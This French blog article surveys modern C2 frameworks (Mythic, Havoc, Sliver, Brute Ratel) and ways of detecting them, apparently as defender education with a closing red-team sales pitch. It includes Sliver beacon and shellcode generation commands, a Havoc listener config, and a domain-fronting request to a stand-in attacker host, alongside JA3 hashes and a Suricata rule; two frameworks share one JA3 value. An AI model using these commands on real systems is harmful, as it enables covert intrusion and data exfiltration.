Expert Cybersécurité & IA
Techniques de Hacking / C2 Frameworks

C2 Frameworks Modernes : Mythic, Havoc, Sliver et Détection

Par Ayi NEDJIMI28 février 2026Lecture : 55 min
#C2Framework#Mythic#Sliver#Havoc#DomainFronting

Auteur : Ayi NEDJIMI    Date : 28 février 2026


Introduction

Les frameworks de Command and Control (C2) sont au coeur de toute opération offensive, qu'il s'agisse de Red Teaming, de tests de pénétration avancés ou d'opérations menées par des acteurs malveillants. Ces outils permettent de maintenir un accès persistant aux systèmes compromis, d'exécuter des commandes à distance, d'exfiltrer des données et de pivoter dans le réseau cible. Si Cobalt Strike a longtemps dominé le paysage C2 — utilisé aussi bien par les Red Teams professionnelles que par les groupes APT et les opérateurs de ransomware — une nouvelle génération de frameworks est apparue, offrant des capacités comparables voire supérieures en termes de furtivité, d'extensibilité et de résistance à la détection.

Cet article examine en profondeur trois frameworks C2 modernes qui redéfinissent l'état de l'art : Mythic, un framework modulaire basé sur des agents polyvalents avec une interface web sophistiquée ; Havoc, un successeur spirituel de Cobalt Strike axé sur l'évasion EDR avec son agent Demon ; et Sliver, un framework Go multi-plateformes développé par BishopFox avec des capacités de communication chiffrée avancées. Nous aborderons également Brute Ratel C4, un outil commercial qui a fait la une de l'actualité cybersécurité. Pour chaque framework, nous détaillerons l'architecture, les capacités des agents, les mécanismes de communication furtive et les techniques de détection correspondantes.

La compréhension de ces outils est essentielle pour les équipes Blue Team et les analystes SOC, car les signatures et comportements de ces frameworks constituent une part croissante des indicateurs de compromission observés dans les incidents réels.


Mythic : Architecture, Agents et Profils

Architecture modulaire de Mythic

Mythic, développé par Cody Thomas (@its_a_feature_), est un framework C2 open-source conçu pour être hautement extensible et collaboratif. Son architecture se distingue par une séparation stricte entre le serveur central (Mythic server), les agents (payload types), les profils de communication (C2 profiles) et les modules de traduction. Chaque composant est conteneurisé via Docker, ce qui facilite le déploiement, la mise à jour et l'isolation.

Composants clés :

# Déploiement de Mythic
git clone https://github.com/its-a-feature/Mythic.git
cd Mythic

# Installation et démarrage
./mythic-cli install github https://github.com/MythicAgents/apollo.git
./mythic-cli install github https://github.com/MythicC2Profiles/http.git
./mythic-cli start

# Accès à l'interface web
# https://mythic-server:7443
# Credentials par défaut dans .env

Agents Mythic : Apollo et Athena

Apollo est l'agent C# le plus mature de l'écosystème Mythic. Il offre des capacités avancées pour les environnements Windows, incluant l'injection de processus (process injection via CreateRemoteThread, QueueUserAPC, NtMapViewOfSection), la manipulation de tokens (steal_token, make_token, rev2self), l'exécution en mémoire d'assemblies .NET (inline execute-assembly), Kerberos ticketing, et le pivot réseau via SMB et TCP. Apollo supporte également le chargement dynamique de BOFs (Beacon Object Files) de Cobalt Strike, offrant la compatibilité avec un vaste écosystème d'outils offensifs.

Athena est un agent plus récent, construit sur .NET 7/8 pour une compatibilité cross-platform (Windows, Linux, macOS). Il utilise NativeAOT pour la compilation, produisant des binaires statiques sans dépendance au runtime .NET. Athena est conçu pour être léger et modulaire, avec un système de plugins chargés dynamiquement.


Havoc et Brute Ratel

Havoc Framework

Havoc, développé par Paul (@C5pider), est un framework C2 post-exploitation conçu spécifiquement pour l'évasion des solutions EDR modernes. Son agent principal, Demon, est écrit en C avec un focus sur la furtivité et la performance. Havoc se distingue par son interface graphique Qt (similaire à Cobalt Strike), son architecture extensible via Python scripting et ses capacités d'évasion natives.

Capacités de Demon (agent Havoc) :

# Configuration du listener Havoc
# havoc.yaotl (configuration YAML-like)
Teamserver {
    Host = "0.0.0.0"
    Port = 40056
    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Nasm = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "SuperSecretPassword123!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.legitimate-domain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

        Uris = ["/api/v1/status", "/cdn/assets", "/update/check"]

        Headers = [
            "Content-Type: application/json",
            "X-Forwarded-For: 10.0.0.1"
        ]
    }
}

Brute Ratel C4 (BRc4)

Brute Ratel C4, développé par Chetan Nayak (@NinjaParanoid), est un framework C2 commercial conçu par un ancien développeur de solutions EDR. Cette perspective défensive unique se reflète dans les capacités d'évasion de l'agent Badger, qui est spécifiquement conçu pour contourner les mécanismes de détection des EDR les plus avancés. BRc4 a fait la une en 2022 lorsque des copies crackées ont été retrouvées dans des campagnes de groupes de ransomware (APT29/Cozy Bear, Black Basta).

Caractéristiques distinctives de BRc4 :

Avertissement : Usage légal uniquement

Les frameworks C2 décrits dans cet article sont des outils légitimes de sécurité offensive destinés aux tests de pénétration autorisés et aux exercices de Red Team contractualisés. Leur utilisation sans autorisation explicite constitue une infraction pénale. Les copies crackées de BRc4 circulant dans les milieux cybercriminels sont un rappel que ces outils peuvent être détournés de leur usage légitime.


Sliver : Implants et Transport

Architecture de Sliver

Sliver, développé par BishopFox, est un framework C2 open-source écrit entièrement en Go. Son point fort est la génération d'implants cross-platform (Windows, Linux, macOS) à partir d'une seule base de code, avec un chiffrement fort par défaut (mTLS) et une variété de protocoles de transport. Sliver est devenu le framework C2 open-source le plus populaire auprès des Red Teams, supplantant progressivement Metasploit pour les opérations avancées.

Types d'implants Sliver :

# Génération d'un implant Sliver
sliver > generate beacon --mtls c2.example.com:8888 \
    --os windows --arch amd64 \
    --format exe \
    --seconds 60 --jitter 30 \
    --name windows-beacon \
    --skip-symbols \
    --debug-file /dev/null

# Génération avec HTTP(S)
sliver > generate beacon --http https://cdn.example.com \
    --os windows --arch amd64 \
    --format shellcode \
    --seconds 300 --jitter 50

# Démarrage d'un listener mTLS
sliver > mtls --lhost 0.0.0.0 --lport 8888

# Démarrage d'un listener HTTPS avec profil personnalisé
sliver > https --lhost 0.0.0.0 --lport 443 \
    --domain cdn.example.com \
    --cert /path/to/cert.pem --key /path/to/key.pem

Protocoles de transport Sliver

Sliver supporte nativement plusieurs protocoles de transport, chacun avec ses avantages en termes de furtivité :

ProtocolePort typiqueChiffrementFurtivité
mTLS8888 (custom)TLS 1.3 mutuelMoyen (port non-standard)
HTTPS443TLS 1.3Élevé (trafic web normal)
DNS53Chiffré sur DNSTrès élevé (DNS rarement filtré)
WireGuardUDP customNoise ProtocolÉlevé (VPN légitime)
Named PipeSMB (445)Chiffré applicatifPivot interne uniquement

Communication Furtive : Domain Fronting et CDN Abuse

Domain Fronting

Le domain fronting est une technique d'évasion réseau qui exploite les CDN (Content Delivery Networks) pour masquer la destination réelle du trafic C2. Le principe consiste à établir une connexion TLS vers un domaine légitime hébergé sur le CDN (ex: www.microsoft.com), puis à spécifier le véritable domaine C2 dans l'en-tête HTTP Host. Le CDN route la requête vers le serveur C2 basé sur l'en-tête Host, tandis que les outils d'inspection réseau ne voient que la connexion TLS vers le domaine frontal légitime.

# Exemple de domain fronting via Azure CDN
# Vue réseau (ce que le SOC voit) :
# TLS SNI: assets.msn.com (domaine Microsoft légitime)
# Destination IP: CDN Azure

# Requête HTTP réelle (après déchiffrement TLS) :
GET /beacon HTTP/1.1
Host: c2-attacker.azureedge.net    <-- Domaine C2 réel
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Cookie: session=ENCRYPTED_C2_DATA

# Le CDN Azure route vers c2-attacker.azureedge.net
# qui pointe vers le serveur C2 de l'attaquant

Limitations actuelles : Les principaux fournisseurs cloud (AWS CloudFront, Azure CDN, Google Cloud) ont progressivement désactivé le domain fronting en vérifiant la cohérence entre le SNI TLS et l'en-tête Host HTTP. Cependant, des variantes restent possibles via des fournisseurs CDN plus permissifs (Fastly, certains CDN régionaux) ou via le domain borrowing qui utilise des domaines légitimes hébergés sur la même infrastructure CDN.

CDN et Cloud Service Abuse

Au-delà du domain fronting, les attaquants utilisent des services cloud légitimes comme redirecteurs C2 :


Malleable C2 Profiles

Personnalisation du trafic réseau

Les profils C2 malléables (malleable C2 profiles) permettent de personnaliser chaque aspect du trafic réseau généré par les implants, de sorte qu'il imite le trafic légitime d'une application connue. Originellement développés pour Cobalt Strike, ce concept a été adopté par la plupart des frameworks C2 modernes. Un profil bien configuré rend le trafic C2 quasiment indistinguable du trafic normal.

Éléments configurables :


Détection : JA3/JA4 et Analyse Comportementale

Fingerprinting TLS avec JA3/JA4

Le fingerprinting TLS est l'une des techniques de détection les plus efficaces contre les C2 modernes. JA3 (développé par Salesforce) et son successeur JA4 (JA4+) créent un hash unique basé sur les paramètres du Client Hello TLS : version TLS, cipher suites proposées, extensions, groupes de courbes elliptiques et formats de point de courbe. Chaque implémentation TLS (navigateur, implant C2, application) produit un fingerprint distinct.

# JA3 Hash - exemples de fingerprints connus
# Chrome 120 (Windows) : 773906b0efdefa24a7f2b8eb6985bf37
# Firefox 121          : b32309a26951912be7dba376398abc3b
# Sliver HTTPS (Go)    : 473cd7cb9faa642487833865d516e578
# Havoc Demon          : 72a589da586844d7f0818ce684948eea
# Cobalt Strike 4.x    : 72a589da586844d7f0818ce684948eea

# Détection via Suricata (IDS)
alert tls any any -> any any (msg:"Potential Sliver C2 - JA3 Match"; \
    ja3.hash; content:"473cd7cb9faa642487833865d516e578"; \
    sid:1000001; rev:1;)

# JA4+ apporte des améliorations
# Format: t[TLS version]d[SNI][cipher count][ext count]_[hash cipher]_[hash ext]
# Exemple: t13d1516h2_8daaf6152771_e5627efa2ab1

Analyse comportementale du trafic

Au-delà du fingerprinting statique, l'analyse comportementale du trafic réseau permet de détecter les communications C2 même lorsque le trafic est correctement déguisé :

Détection sur l'endpoint

Les EDR modernes détectent les frameworks C2 via plusieurs mécanismes complémentaires sur l'endpoint :

Stratégie de détection multi-couches

Une détection efficace des C2 modernes nécessite une approche combinant : (1) le fingerprinting TLS (JA3/JA4) pour la détection initiale, (2) l'analyse comportementale du trafic réseau (beaconing, asymétrie), (3) le monitoring des endpoints (mémoire, API, ETW), et (4) la corrélation SIEM entre les alertes réseau et endpoint. Aucune couche seule n'est suffisante face aux C2 modernes dotés de capacités d'évasion avancées.


Conclusion

Le paysage des frameworks C2 a considérablement évolué au-delà du duopole historique Cobalt Strike / Metasploit. Mythic offre une extensibilité et une collaboration inégalées pour les opérations Red Team complexes. Havoc et Brute Ratel repoussent les limites de l'évasion EDR avec des techniques comme le sleep obfuscation, les syscalls indirects et le stack spoofing. Sliver démocratise l'accès à un C2 cross-platform performant avec son approche open-source et ses multiples protocoles de transport.

Pour les équipes défensives, la réponse doit être proportionnelle à la sophistication de ces outils. Les défenses basées uniquement sur les signatures sont désormais insuffisantes. Une stratégie de détection efficace combine le fingerprinting réseau (JA3/JA4), l'analyse comportementale du trafic (beaconing, patterns temporels), le monitoring des endpoints via ETW et les capacités de memory forensics, et la corrélation SIEM pour identifier les chaînes d'attaque complètes. L'investissement dans la formation des analystes SOC sur les comportements spécifiques de ces frameworks est également crucial.


Ressources et références

Ayi NEDJIMI

Ayi NEDJIMI

Expert en Cybersécurité & Intelligence Artificielle

Consultant senior avec plus de 15 ans d'expérience en sécurité offensive, audit d'infrastructure et développement de solutions IA. Certifié OSCP, CISSP, ISO 27001 Lead Auditor et ISO 42001 Lead Implementer. Intervient sur des missions de pentest Active Directory, sécurité Cloud et conformité réglementaire pour des grands comptes et ETI.

Passez à l'Action

Nos experts Red Team utilisent ces frameworks pour tester vos défenses. Évaluez la résistance de votre SOC face aux C2 modernes.

Demander un Devis Personnalisé
Ayi NEDJIMI

Ayi NEDJIMI

Expert en Cybersécurité & Intelligence Artificielle

Consultant senior, certifié OSCP, CISSP et ISO 27001 Lead Auditor. Plus de 15 ans d'expérience en pentest, audit et solutions IA.

Besoin d'une expertise en cybersécurité ?

Testez vos défenses contre les C2 frameworks modernes

Nos Services